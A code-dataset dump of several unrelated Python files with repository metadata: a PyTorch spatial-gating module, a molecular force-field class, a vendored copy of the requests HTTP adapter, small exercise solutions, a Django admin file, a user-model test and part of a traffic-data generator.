"Apache-2.0"
] | permissive | jingmouren/LearnableTreeFilterV2 | bf63e754fb0943afb039ee0111a9a884fe46eb38 | 3814a5a84c0a5c33d6538749eaf5aed4827366de | refs/heads/main | 2023-01-22T22:47:15.581961 | 2020-11-27T04:07:33 | 2020-11-27T04:07:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,616 | py | import math
import torch
import torch.nn.functional as F
from torch import nn
from prodict import Prodict
from cvpods.layers import get_norm
from cvpods.modeling.nn_utils import weight_init
from cvpods.layers import Conv2d, get_activation, get_norm, masked_conv2d
def get_module_running_cost(net):
outputs = [[], [], []]
for module in net.modules():
if isinstance(module, SpatialGate):
cost = module.running_cost
if cost is not None:
for idx in range(len(cost)):
outputs[idx].append(cost[idx].reshape(cost[idx].shape[0], -1).sum(1))
module.clear_running_cost()
for idx in range(len(cost)):
outputs[idx] = sum(outputs[idx])
return outputs
class BasicBlock(nn.Module):
def __init__(
self,
in_channels,
out_channels,
stride=1,
norm="BN",
activation=None
):
super().__init__()
if in_channels != out_channels:
self.shortcut = Conv2d(
in_channels,
out_channels,
kernel_size=1,
stride=stride,
bias=False,
norm=get_norm(norm, out_channels),
)
else:
self.shortcut = None
self.activation = get_activation(activation)
self.conv1 = Conv2d(
in_channels,
out_channels,
kernel_size=3,
stride=stride,
padding=1,
bias=False,
norm=get_norm(norm, out_channels),
)
self.conv2 = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False,
norm=get_norm(norm, out_channels),
)
def masked_inference(self, x, gate):
# gate = torch.zeros_like(gate)
# out = masked_conv2d(x, F.max_pool2d(gate, kernel_size=3, stride=1, padding=1).squeeze(dim=1),
# self.conv1.weight, self.conv1.bias, 1, 1, [self.conv1.norm, self.activation])
# out = masked_conv2d(out, gate.squeeze(dim=1), self.conv2.weight,
# self.conv2.bias, 1, 1, self.conv2.norm)
out = x
return out
def forward(self, x, gate_func):
if self.shortcut is not None:
shortcut = self.shortcut(x)
else:
shortcut = x
if not self.training:
out = gate_func(x, x, self.masked_inference)
out = out + shortcut
out = self.activation(out)
return out
out = self.conv1(x)
out = self.activation(out)
out = self.conv2(out)
out = gate_func(out, x) + shortcut
out = self.activation(out)
return out
class SpatialGate(nn.Module):
def __init__(
self,
in_channels : int,
num_groups : int = 1,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None,
get_running_cost : callable = None
):
super(SpatialGate, self).__init__()
self.num_groups = num_groups
self.gate_conv = nn.Conv2d(in_channels,
num_groups,
kernel_size,
padding=padding,
stride=stride)
self.gate_activation = gate_activation
self.gate_activation_kargs = gate_activation_kargs
if gate_activation == "ReTanH":
self.gate_activate = lambda x : torch.tanh(x).clamp(min=0)
elif gate_activation == "Sigmoid":
self.gate_activate = lambda x : torch.sigmoid(x)
elif gate_activation == "GeReTanH":
assert "tau" in gate_activation_kargs
tau = gate_activation_kargs["tau"]
ttau = math.tanh(tau)
self.gate_activate = lambda x : ((torch.tanh(x - tau) + ttau) / (1 + ttau)).clamp(min=0)
else:
raise NotImplementedError()
self.get_running_cost = get_running_cost
self.running_cost = None
self.init_parameters()
def init_parameters(self, init_gate=0.99):
if self.gate_activation == "ReTanH":
bias_value = 0.5 * math.log((1 + init_gate) / (1 - init_gate))
elif self.gate_activation == "Sigmoid":
bias_value = 0.5 * math.log(init_gate / (1 - init_gate))
elif self.gate_activation == "GeReTanH":
tau = self.gate_activation_kargs["tau"]
bias_value = 0.5 * math.log((1 + init_gate * math.exp(2 * tau)) / (1 - init_gate))
nn.init.normal_(self.gate_conv.weight, std=0.01)
nn.init.constant_(self.gate_conv.bias, bias_value)
def encode(self, *inputs):
outputs = [x.view(x.shape[0] * self.num_groups, -1, *x.shape[2:]) for x in inputs]
return outputs
def decode(self, *inputs):
outputs = [x.view(x.shape[0] // self.num_groups, -1, *x.shape[2:]) for x in inputs]
return outputs
def update_running_cost(self, gate):
if self.get_running_cost is not None:
cost = self.get_running_cost(gate)
if self.running_cost is not None:
self.running_cost = [x + y for x, y in zip(self.running_cost, cost)]
else:
self.running_cost = cost
def clear_running_cost(self):
self.running_cost = None
def forward(self, data_input, gate_input, masked_func=None):
gate = self.gate_activate(self.gate_conv(gate_input))
self.update_running_cost(gate)
if masked_func is not None:
data_input = masked_func(data_input, gate)
data, gate = self.encode(data_input, gate)
output, = self.decode(data * gate)
return output
class DynamicBottleneck(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None
):
super(DynamicBottleneck, self).__init__()
self.num_groups = num_groups
self.norm = norm
self.in_channels = in_channels
self.out_channels = out_channels
self.bottleneck = BasicBlock(in_channels,
out_channels,
stride=stride,
norm=norm,
activation=Prodict(NAME="ReLU", INPLACE=True))
self.gate = SpatialGate(in_channels,
num_groups=num_groups,
kernel_size=kernel_size,
padding=padding,
stride=stride,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
get_running_cost=self.get_running_cost)
self.init_parameters()
def init_parameters(self):
self.gate.init_parameters()
for layer in self.bottleneck.modules():
if isinstance(layer, nn.Conv2d):
torch.nn.init.normal_(layer.weight, mean=0, std=0.01)
if layer.bias is not None:
torch.nn.init.constant_(layer.bias, 0)
if isinstance(layer, nn.GroupNorm):
torch.nn.init.constant_(layer.weight, 1)
torch.nn.init.constant_(layer.bias, 0)
def get_running_cost(self, gate):
conv_costs = [x * 3 ** 2 for x in [self.in_channels * self.out_channels, self.out_channels ** 2]]
if self.in_channels != self.out_channels:
conv_costs[-1] += self.in_channels * out_channels
norm_cost = self.out_channels if self.norm != "none" else 0
unit_costs = [conv_cost + norm_cost for conv_cost in conv_costs]
running_cost = None
for unit_cost in unit_costs[::-1]:
num_groups = gate.shape[1]
hard_gate = (gate != 0).float()
cost = [gate * unit_cost / num_groups,
hard_gate * unit_cost / num_groups,
torch.ones_like(gate) * unit_cost / num_groups]
cost = [x.flatten(1).sum(-1) for x in cost]
gate = F.max_pool2d(gate, kernel_size=3, stride=1, padding=1)
gate = gate.max(dim=1, keepdim=True).values
if running_cost is None:
running_cost = cost
else:
running_cost = [x + y for x, y in zip(running_cost, cost)]
return running_cost
def forward(self, input):
output = self.bottleneck(input, self.gate)
# output = self.gate(data, input)
return output
class DynamicConv2D(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
num_convs : int,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None,
depthwise: bool = False
):
super(DynamicConv2D, self).__init__()
if depthwise:
assert in_channels == out_channels
self.num_groups = num_groups
self.norm = norm
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.depthwise = depthwise
convs = []
for _ in range(num_convs):
convs += [nn.Conv2d(in_channels,
out_channels,
kernel_size,
stride=stride,
padding=padding,
groups=in_channels if depthwise else 1),
get_norm(norm, in_channels)]
in_channels = out_channels
self.convs = nn.Sequential(*convs)
self.gate = SpatialGate(in_channels,
num_groups=num_groups,
kernel_size=kernel_size,
padding=padding,
stride=stride,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
get_running_cost=self.get_running_cost)
self.init_parameters()
def init_parameters(self):
self.gate.init_parameters()
for layer in self.convs.modules():
if isinstance(layer, nn.Conv2d):
torch.nn.init.normal_(layer.weight, mean=0, std=0.01)
if layer.bias is not None:
torch.nn.init.constant_(layer.bias, 0)
if isinstance(layer, nn.GroupNorm):
torch.nn.init.constant_(layer.weight, 1)
torch.nn.init.constant_(layer.bias, 0)
def get_running_cost(self, gate):
if self.depthwise:
conv_cost = self.in_channels * len(self.convs) * \
self.kernel_size ** 2
else:
conv_cost = self.in_channels * self.out_channels * len(self.convs) * \
self.kernel_size ** 2
norm_cost = self.out_channels if self.norm != "none" else 0
unit_cost = conv_cost + norm_cost
hard_gate = (gate != 0).float()
cost = [gate.detach() * unit_cost / self.num_groups,
hard_gate * unit_cost / self.num_groups,
torch.ones_like(gate) * unit_cost / self.num_groups]
cost = [x.flatten(1).sum(-1) for x in cost]
return cost
def forward(self, input):
data = self.convs(input)
output = self.gate(data, input)
return output
class DynamicScale(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
num_convs: int = 1,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
num_adjacent_scales: int = 2,
depth_module: nn.Module = None,
resize_method: str = "bilinear",
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None
):
super(DynamicScale, self).__init__()
self.num_groups = num_groups
self.num_adjacent_scales = num_adjacent_scales
self.depth_module = depth_module
dynamic_convs = [DynamicConv2D(
in_channels,
out_channels,
num_convs=num_convs,
kernel_size=kernel_size,
padding=padding,
stride=stride,
num_groups=num_groups,
norm=norm,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
depthwise=True
) for _ in range(num_adjacent_scales)]
self.dynamic_convs = nn.ModuleList(dynamic_convs)
if resize_method == "bilinear":
self.resize = lambda x, s : F.interpolate(
x, size=s, mode="bilinear", align_corners=True)
else:
raise NotImplementedError()
self.scale_weight = nn.Parameter(torch.zeros(1))
self.output_weight = nn.Parameter(torch.ones(1))
self.init_parameters()
def init_parameters(self):
for module in self.dynamic_convs:
module.init_parameters()
def forward(self, inputs):
dynamic_scales = []
for l, x in enumerate(inputs):
dynamic_scales.append([m(x) for m in self.dynamic_convs])
outputs = []
for l, x in enumerate(inputs):
scale_feature = []
for s in range(self.num_adjacent_scales):
l_source = l + s - self.num_adjacent_scales // 2
l_source = l_source if l_source < l else l_source + 1
if l_source >= 0 and l_source < len(inputs):
feature = self.resize(dynamic_scales[l_source][s], x.shape[-2:])
scale_feature.append(feature)
scale_feature = sum(scale_feature) * self.scale_weight + x * self.output_weight
if self.depth_module is not None:
scale_feature = self.depth_module(scale_feature)
outputs.append(scale_feature)
return outputs
| [
"stevengrove@stu.xjtu.edu.cn"
] | stevengrove@stu.xjtu.edu.cn |
eccc336a352e0d802ed588afb9de41f3723494d3 | ac82f56dc4c7cb6b370d51c0779113a981ef3f01 | /intermol/forces/lj_sigeps_nonbonded_type.py | b06a03a785faa4b02f7e13d431a7dec2ac915d29 | [
"MIT"
] | permissive | ctk3b/InterMol | d1e8a53efedcd180ba6e3d5cf80788defae478fb | 5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d | refs/heads/master | 2020-04-04T20:47:41.012740 | 2017-03-12T20:51:01 | 2017-03-12T20:51:01 | 40,187,082 | 0 | 0 | null | 2015-08-04T13:42:12 | 2015-08-04T13:42:11 | null | UTF-8 | Python | false | false | 1,302 | py | import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_nonbonded_type import AbstractNonbondedType
class LjSigepsNonbondedType(AbstractNonbondedType):
__slots__ = ['sigma', 'epsilon', 'type']
@accepts_compatible_units(None, None,
sigma=units.nanometers,
epsilon=units.kilojoules_per_mole,
type=None)
def __init__(self, bondingtype1, bondingtype2,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
AbstractNonbondedType.__init__(self, bondingtype1, bondingtype2, type)
self.sigma = sigma
self.epsilon = epsilon
class LjSigepsNonbonded(LjSigepsNonbondedType):
"""
stub documentation
"""
def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
self.atom1 = atom1
self.atom2 = atom2
LjSigepsNonbondedType.__init__(self, bondingtype1, bondingtype2,
sigma=sigma,
epsilon=epsilon,
type=type) | [
"christoph.t.klein@me.com"
] | christoph.t.klein@me.com |
8f802d5a06c8affa293d6fc923516647aea1786f | e14372adf86d3c4f9e73c9f7111db3215c696c3d | /1.入门/从入门到实践/5-1.py | d3c8ef6dd09777d806fc8818c2f24fdc77aee7bf | [] | no_license | hewei-bit/PYTHON_learning | 71ddd7560a52575528547187f4fb40f39a3cbbdb | 18de8e5bdca165df5a5a4b5e0887846593656f4e | refs/heads/master | 2022-12-02T13:38:05.907135 | 2020-08-13T04:57:41 | 2020-08-13T04:57:41 | 261,647,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | age = int(input('请输入年龄:'))
if age < 2:
print('这个人是个婴儿')
elif age <4:
print('这个人正在蹒跚学步')
| [
"1003826976@qq.com"
] | 1003826976@qq.com |
65973df5fe958ef43d875007d011cb487127b30f | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Algorithms/Beautiful Strings/solution.py | 33a4185d9020a23110d3f259c0ff305bdb2dd595 | [
"MIT"
] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 875 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import defaultdict
t = int(input())
for _ in range(t):
l = input().strip()
count_a = count_b = count_c = 0
delta_patterns = defaultdict(int)
delta_patterns[(0, 0)] = 1
for c in l:
if c == 'a':
count_a += 1
elif c == 'b':
count_b += 1
elif c == 'c':
count_c += 1
combine = (count_a - count_b, count_a - count_c)
delta_patterns[combine] += 1
result = 0
for count in delta_patterns.values():
if count > 1:
result += (count - 1) * count // 2
print(result)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
ea5ae52448c1744bc885cded9dd21cfdfc274cc2 | 6deafbf6257a5c30f084c3678712235c2c31a686 | /Toolz/dirsearch/thirdparty/requests/adapters.py | f911fc5730d74e1c476e85e4ec74ec4b3be6c1e2 | [
"GPL-2.0-only",
"Unlicense"
] | permissive | thezakman/CTF-Heaven | 53fcb4a72afa821ad05d8cc3b309fb388f958163 | 4b52a2178922f1502ab00fa8fc156d35e1dc653f | refs/heads/master | 2023-04-05T18:20:54.680378 | 2023-03-21T13:47:45 | 2023-03-21T13:47:45 | 167,290,879 | 182 | 24 | Unlicense | 2022-11-29T21:41:30 | 2019-01-24T02:44:24 | Python | UTF-8 | Python | false | false | 16,627 | py | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .packages.urllib3.util.retry import Retry
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url, urldefragauth,
select_proxy)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import ConnectTimeoutError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .packages.urllib3.exceptions import ProtocolError
from .packages.urllib3.exceptions import ReadTimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import ResponseError
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError)
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
DEFAULT_POOL_TIMEOUT = None
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param int max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed DNS lookups, socket
connections and connection timeouts, never to requests where data has
made it to the server. By default, Requests does not retry failed
connections. If you need granular control over the conditions under
which we retry a request, import urllib3's ``Retry`` class and pass
that instead.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
if max_retries == DEFAULT_RETRIES:
self.max_retries = Retry(0, read=False)
else:
self.max_retries = Retry.from_int(max_retries)
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# because self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, strict=True, **pool_kwargs)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
if not proxy in self.proxy_manager:
proxy_headers = self.proxy_headers(proxy)
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return self.proxy_manager[proxy]
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxy = select_proxy(url, proxies)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
"""
proxy = select_proxy(request.url, proxies)
scheme = urlparse(request.url).scheme
if proxy and scheme != 'https':
url = urldefragauth(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple
:param verify: (optional) Whether to verify SSL certificates.
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if isinstance(timeout, tuple):
try:
connect, read = timeout
timeout = TimeoutSauce(connect=connect, read=read)
except ValueError as e:
# this may raise a string formatting error.
err = ("Invalid timeout {0}. Pass a (connect, read) "
"timeout tuple, or a single float to set "
"both timeouts to the same value".format(timeout))
raise ValueError(err)
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
except (ProtocolError, socket.error) as err:
raise ConnectionError(err, request=request)
except MaxRetryError as e:
if isinstance(e.reason, ConnectTimeoutError):
raise ConnectTimeout(e, request=request)
if isinstance(e.reason, ResponseError):
raise RetryError(e, request=request)
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, ReadTimeoutError):
raise ReadTimeout(e, request=request)
else:
raise
return self.build_response(request, resp)
| [
"thezakman@ctf-br.org"
] | thezakman@ctf-br.org |
1c81f2b5373941ff4b3cacc4269d00c333b9dfab | 09aee268ce72d282f53fe94f42478e2b3b48127d | /PracticemodelformProject/testapp/admin.py | 204fdaf32620f4860c87848b9f5ccbbb2094de3c | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | from django.contrib import admin
from testapp.models import Student
# Register your models here.
class StudentAdmin(admin.ModelAdmin):
list_display=['name','marks']
admin.site.register(Student,StudentAdmin)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
53410072ce6d7e6b0748d3be7521fbceb1cb762d | 0bdfefad123a03754713c64582a3986bd26965bd | /tests/test_user.py | 5f947fd39d6c494f18bedaa1ea4c80ede89935a6 | [] | no_license | Kennedy128/pitch-survey | 889d7747139b88df76bfb09d8801d83cf05063b7 | f6c0cb8ab8a57ba4b59b53a8a6092d0c023dc8e5 | refs/heads/master | 2022-05-29T07:46:54.391714 | 2020-05-05T23:05:00 | 2020-05-05T23:05:00 | 260,503,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import unittest
from app.models import User
from app import db
class UserModelTest(unittest.TestCase):
def setUp(self):
self.new_user = User(username = "kennedy", email ="kennedymbithi12@gmail.com", bio = "I am incredible", profile_pic_url = "image_url", password = 'kenny', id = 1 )
def tearDown(self):
User.query.delete()
def test_save_user(self):
self.new_user.save_user()
self.assertTrue(len(User.query.all())>0)
def test_password_setter(self):
self.assertTrue(self.new_user.pass_secure is not None)
def test_no_access_password(self):
with self.assertRaises(AttributeError):
self.new_user.password
def test_password_verification(self):
self.assertTrue(self.new_user.verify_password('Kennedy'))
def test_check_instance_variables(self):
self.assertEquals(self.new_user.username, 'kennedy')
self.assertEquals(self.new_user.email, 'kennedymbithi12@gmail.com')
self.assertEquals(self.new_user.bio, 'I am incredible')
self.assertEquals(self.new_user.profile_pic_url, 'image_url')
self.assertEquals(self.new_user.password,'kenny' ) | [
"santa@northpole.com"
] | santa@northpole.com |
5bc14ae5ea3af7ab4372e0256775d3e2aac22f15 | 12321723fce2266e1579b4b30c39b9589008e21a | /FileHandling/Datatypes/Demo15.py | a3a50fe007351a893f1cc7c4dadc7ea1113d224c | [] | no_license | narrasubbarao/practise | 77ff99e6934b8c572dbefbd440da174998360326 | 882a451febbee93d0c5dc2d6e54b1bc50ec2bff5 | refs/heads/master | 2020-04-22T14:39:53.242896 | 2019-02-22T07:39:49 | 2019-02-22T07:39:49 | 170,451,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py |
t1 = (9,20,30,10,20,50,60,10)
no = t1.count(10)
print(no)
pos = t1.index(10)
print(pos) | [
"narrasubbarao29@gmail.com"
] | narrasubbarao29@gmail.com |
b5d963da42ff8506f0eeb54936e68ed7926e4e90 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /BuildingMachineLearningSystemsWithPython/ch01/gen_webstats.py | fa133d769a16dc477cbbb22ac4d2ba34f9a13a27 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,289 | py | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
# This script generates web traffic data for our hypothetical
# web startup "MLASS" in chapter 01
import os
import scipy as sp
from scipy.stats import gamma
import matplotlib.pyplot as plt
from utils import DATA_DIR, CHART_DIR
sp.random.seed(3) # to reproduce the data later on
x = sp.arange(1, 31 * 24)
y = sp.array(200 * (sp.sin(2 * sp.pi * x / (7 * 24))), dtype=int)
y += gamma.rvs(15, loc=0, scale=100, size=len(x))
y += 2 * sp.exp(x / 100.0)
